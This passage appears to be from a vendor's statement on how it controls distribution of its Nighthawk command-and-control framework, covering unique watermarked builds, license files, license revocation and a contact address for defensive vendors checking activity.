These are some of the many soft and procedural controls that we put in place to control distribution and sale of the software. However, these are not the only controls to consider and a number of technical controls are also in place. While we do not intend to delve too deeply in to how these are implemented to maintain their integrity, what we will say is that every build of Nighthawk is unique and not only the generated artifacts but various other components of the framework can be attributed back to the end user through the implementation of a variety of watermarks. In addition to the watermarks, operational usage of the c2 of course requires a license file which is issued in accordance with the validity of the license period. While we have not seen any abuse of the software, we reserve the right to revoke any licenses that are misused.

While we fully understand any licensing system can be cracked (we’re hackers after all!), we firmly believe that the layered mixture of soft and technical controls that have been implemented stand us in good stead to responsibly distribute the product to responsible customers.

MDSec takes purported misuse of its products extremely seriously and should any defensive vendors wish to confirm the legitimacy of any activity, we encourage them to reach out to us using support@nighthawkc2.io where we’ll be more than happy to provide assistance without attribution.